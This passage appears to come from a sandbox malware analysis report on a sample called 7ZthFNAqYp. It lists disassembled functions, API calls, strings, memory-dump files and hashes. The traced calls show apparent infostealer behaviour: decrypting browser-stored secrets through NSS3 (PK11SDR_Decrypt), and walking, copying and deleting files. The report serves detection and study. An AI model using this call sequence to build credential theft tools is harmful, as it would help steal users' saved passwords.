                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B12D6706083418FD715CF1AC48466ABBF2BF85318F198A6DD9958BF51D731EC8ACB82
                                                                                                                                                                                                              Function 6CA4ECC0 Relevance: 20.0, APIs: 8, Strings: 3, Instructions: 741COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA4ED0A
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA4EE68
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CA4EF87
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6CA4EF98
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • database corruption, xrefs: 6CA4F48D
                                                                                                                                                                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CA4F483
                                                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 6CA4F492
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _byteswap_ulong
                                                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                              • API String ID: 4101233201-598938438
                                                                                                                                                                                                              • Opcode ID: a2e91d8bc798f799d92a42a720b9d9336cb18c3b0c091809770213808525e46d
                                                                                                                                                                                                              • Instruction ID: c7a9cbff134d1153840a187931ac8ef9ac7c9e2cce1909f988492dda894f6138
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2e91d8bc798f799d92a42a720b9d9336cb18c3b0c091809770213808525e46d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C962E174A042458FDB04CF28C880B9ABBB2BF45318F1CD19DD8555BB92D775E8C6CB91
                                                                                                                                                                                                              Function 6CAE7D60 Relevance: 18.3, APIs: 12, Instructions: 299COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SECOID_FindOID_Util.NSS3(?), ref: 6CAE7DDC
                                                                                                                                                                                                                • Part of subcall function 6CB207B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CAC8298,?,?,?,6CABFCE5,?), ref: 6CB207BF
                                                                                                                                                                                                                • Part of subcall function 6CB207B0: PL_HashTableLookup.NSS3(?,?), ref: 6CB207E6
                                                                                                                                                                                                                • Part of subcall function 6CB207B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CB2081B
                                                                                                                                                                                                                • Part of subcall function 6CB207B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CB20825
                                                                                                                                                                                                              • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CAE7DF3
                                                                                                                                                                                                              • PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6CAE7F07
                                                                                                                                                                                                              • PK11_GetPadMechanism.NSS3(00000000), ref: 6CAE7F57
                                                                                                                                                                                                              • PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6CAE7F98
                                                                                                                                                                                                              • PK11_FreeSymKey.NSS3(?), ref: 6CAE7FC9
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CAE7FDE
                                                                                                                                                                                                              • PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6CAE8000
                                                                                                                                                                                                                • Part of subcall function 6CB09430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6CAE7F0C,?,00000000,00000000,00000000,?), ref: 6CB0943B
                                                                                                                                                                                                                • Part of subcall function 6CB09430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6CB0946B
                                                                                                                                                                                                                • Part of subcall function 6CB09430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6CB09546
                                                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CAE8110
                                                                                                                                                                                                              • PK11_FreeSymKey.NSS3(00000000), ref: 6CAE811D
                                                                                                                                                                                                              • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6CAE822D
                                                                                                                                                                                                              • SECKEY_DestroyPublicKey.NSS3(?), ref: 6CAE823C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1923011919-0
                                                                                                                                                                                                              • Opcode ID: 3613aa913e18ce892e775bd5707b4a67abd2cc542039085aba942e10af86edb2
                                                                                                                                                                                                              • Instruction ID: fa90d9a3d623a7da9208b95087b0f9231670f18381f33320d64967127a4de3ec
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3613aa913e18ce892e775bd5707b4a67abd2cc542039085aba942e10af86edb2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 12C16FB1D402599BEB21CF18CC40BEEB7B9AF09348F0481E5E91DA6641E7319EC5DF90
                                                                                                                                                                                                              Function 0092CD0C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 298filestringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 0092CD31
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 0092CD48
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,009574E4), ref: 0092CD69
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,009574E8), ref: 0092CD83
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • lstrlenA.KERNEL32(0092D38A,0095685F,009574EC,?,0095685E), ref: 0092CE16
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,00957504,0095686E,?,00957500,009574FC,009574F8,009574F4), ref: 0092D0F7
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 0092D10B
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00927FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0092E72B,?,?,?), ref: 00927FC7
                                                                                                                                                                                                                • Part of subcall function 00927FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FDE
                                                                                                                                                                                                                • Part of subcall function 00927FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FF5
                                                                                                                                                                                                                • Part of subcall function 00927FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0092E72B,?,?,?), ref: 0092800C
                                                                                                                                                                                                                • Part of subcall function 00927FAC: CloseHandle.KERNEL32(?,?,?,?,?,0092E72B,?,?,?), ref: 00928034
                                                                                                                                                                                                                • Part of subcall function 00937023: CreateThread.KERNEL32(00000000,00000000,00936F52,?,00000000,00000000), ref: 009370C2
                                                                                                                                                                                                                • Part of subcall function 00937023: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 009370CA
                                                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 0092D211
                                                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 0092D225
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$lstrcpy$Find$CloseCreatelstrcatlstrlen$AllocCopyDeleteFirstHandleLocalNextObjectReadSingleSizeThreadWaitwsprintf
                                                                                                                                                                                                              • String ID: %s\*.*
                                                                                                                                                                                                              • API String ID: 3967855609-1013718255
                                                                                                                                                                                                              • Opcode ID: c855315a56b487c53914bd7358db5d5db3a103af29ab513d05c105d99edfb0c7
                                                                                                                                                                                                              • Instruction ID: dfa6a304a47301cebd0d12bea82bf2e1c7d3f7671d966be6bd94615f728c558f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c855315a56b487c53914bd7358db5d5db3a103af29ab513d05c105d99edfb0c7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9ED1A73690112D9BDF21EB25ED46BDDB7B4AFC4304F4141E1B948B7126DA30AF8A8F81
                                                                                                                                                                                                              Function 6CB11CE0 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 401COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00000020), ref: 6CB11F19
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00000020), ref: 6CB12166
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00000010), ref: 6CB1228F
                                                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00000010), ref: 6CB123B8
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CB1241C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memcpy$Error
                                                                                                                                                                                                              • String ID: manufacturer$model$serial$token
                                                                                                                                                                                                              • API String ID: 3204416626-1906384322
                                                                                                                                                                                                              • Opcode ID: 299901f650154c09e4dd3df5074630912175a661567b856c7441f64db40c6d51
                                                                                                                                                                                                              • Instruction ID: 74f188bb098b7fb6aba61e5a2b7f73ff2825f2b352ba53b83317114caf613e19
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 299901f650154c09e4dd3df5074630912175a661567b856c7441f64db40c6d51
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2702FF62E0C7C86EFB318671D44C3D76AE0DB56328F5C166EC5DE46E83C3A859898393
                                                                                                                                                                                                              Function 6CB16C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CAC1C6F,00000000,00000004,?,?), ref: 6CB16C3F
                                                                                                                                                                                                                • Part of subcall function 6CB6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB6C2BF
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6CAC1C6F,00000000,00000004,?,?), ref: 6CB16C60
                                                                                                                                                                                                              • PR_ExplodeTime.NSS3(00000000,6CAC1C6F,?,?,?,?,?,00000000,00000000,00000000,?,6CAC1C6F,00000000,00000004,?,?), ref: 6CB16C94
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                                                                                                                                              • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                                                              • API String ID: 3534712800-180463219
                                                                                                                                                                                                              • Opcode ID: 98e32f891851546ffdae0a8a879e4b46ef029581fab8d845431694540edf55b1
                                                                                                                                                                                                              • Instruction ID: d93e3677f8eb9b7f168328ae0855d9bde89231844c3d2ad61c422ba6b3235beb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 98e32f891851546ffdae0a8a879e4b46ef029581fab8d845431694540edf55b1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F0513B72B015494FC718CDADDC526DEB7DAEBA4310F48C23AE842DBB81D638D906C751
                                                                                                                                                                                                              Function 0092A7AD Relevance: 15.1, APIs: 10, Instructions: 94stringencryptionCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0092A7EA
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0092AABC), ref: 0092A805
                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0092A80D
                                                                                                                                                                                                              • PK11_GetInternalKeySlot.NSS3(?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0092AABC), ref: 0092A81B
                                                                                                                                                                                                              • PK11_Authenticate.NSS3(00000000,00000001,00000000,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0092AABC), ref: 0092A82F
                                                                                                                                                                                                              • PK11SDR_Decrypt.NSS3(?,?,00000000,?,00000000,00000000,00000000,00000000,00000014,?,0092AABC), ref: 0092A86F
                                                                                                                                                                                                              • _memmove.LIBCMT ref: 0092A890
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00956801,00956803,?,00000000,00000000,00000000,00000000,00000014,?,0092AABC), ref: 0092A8BA
                                                                                                                                                                                                              • PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,0092B7F9), ref: 0092A8C1
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00956801,0095680A,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0092AABC), ref: 0092A8D0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: K11_$Slotlstrcat$AuthenticateBinaryCryptDecryptFreeInternalString_memmove_memsetlstrlen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4058207798-0
                                                                                                                                                                                                              • Opcode ID: ec56215e0b3d0dce3fb15c1a673fc09779e97a5c80ff4fcbf53c2abc7c68fa6a
                                                                                                                                                                                                              • Instruction ID: a24adbc542b2be0248a00472094ef22a784583f97893c582b90d71c508f456ac
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ec56215e0b3d0dce3fb15c1a673fc09779e97a5c80ff4fcbf53c2abc7c68fa6a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB3170B2D04129AFDB109B64DC859FAB7BCAF48341F4404F5F50DE3141EB749A858F52
                                                                                                                                                                                                              Function 0092B914 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 319fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,\*.*,00956826,?,?,?), ref: 0092B970
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00957434), ref: 0092B991
                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00957438), ref: 0092B9AB
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 00931C1F: GetSystemTime.KERNEL32(?,009566E2,?), ref: 00931C4E
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 0092BDE0
                                                                                                                                                                                                                • Part of subcall function 00927FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0092E72B,?,?,?), ref: 00927FC7
                                                                                                                                                                                                                • Part of subcall function 00927FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FDE
                                                                                                                                                                                                                • Part of subcall function 00927FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0092E72B,?,?,?), ref: 00927FF5
                                                                                                                                                                                                                • Part of subcall function 00927FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0092E72B,?,?,?), ref: 0092800C
                                                                                                                                                                                                                • Part of subcall function 00927FAC: CloseHandle.KERNEL32(?,?,?,?,?,0092E72B,?,?,?), ref: 00928034
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0092BE57
                                                                                                                                                                                                                • Part of subcall function 009304EE: lstrcpyA.KERNEL32(00000000,?,?,00921D07,?,009377AD), ref: 0093050D
                                                                                                                                                                                                                • Part of subcall function 00937023: CreateThread.KERNEL32(00000000,00000000,00936F52,?,00000000,00000000), ref: 009370C2
                                                                                                                                                                                                                • Part of subcall function 00937023: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 009370CA
                                                                                                                                                                                                              • FindNextFileA.KERNEL32(?,?), ref: 0092BEC6
                                                                                                                                                                                                              • FindClose.KERNEL32(?), ref: 0092BEDA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$lstrcpy$Find$CloseCreatelstrcat$AllocCopyDeleteFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitlstrlen
                                                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                                                              • API String ID: 2055012574-1173974218
                                                                                                                                                                                                              • Opcode ID: 287deef941667da143675b00877718a35dbce2a9d3929bce02381c569b259cbe
                                                                                                                                                                                                              • Instruction ID: be50ee2a160b52e8586f02a28b7b2ef3a93aa89111113848906e632ce2c469d3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 287deef941667da143675b00877718a35dbce2a9d3929bce02381c569b259cbe
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 79E18C3591052D9BCF21EB25ED56BCDB774AF84305F4141E1A948B7226DB34AFCA8F80
                                                                                                                                                                                                              Function 6CA5AEC0 Relevance: 13.7, APIs: 9, Instructions: 242COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,00000002,?,6CB7CF46,?,6CA4CDBD,?,6CB7BF31,?,?,?,?,?,?,?), ref: 6CA5B039
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CB7CF46,?,6CA4CDBD,?,6CB7BF31), ref: 6CA5B090
                                                                                                                                                                                                              • sqlite3_free.NSS3(?,?,?,?,?,?,6CB7CF46,?,6CA4CDBD,?,6CB7BF31), ref: 6CA5B0A2
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,6CB7CF46,?,6CA4CDBD,?,6CB7BF31,?,?,?,?,?,?,?,?,?), ref: 6CA5B100
                                                                                                                                                                                                              • sqlite3_free.NSS3(?,?,00000002,?,6CB7CF46,?,6CA4CDBD,?,6CB7BF31,?,?,?,?,?,?,?), ref: 6CA5B115
                                                                                                                                                                                                              • sqlite3_free.NSS3(?,?,?,?,?,?,6CB7CF46,?,6CA4CDBD,?,6CB7BF31), ref: 6CA5B12D
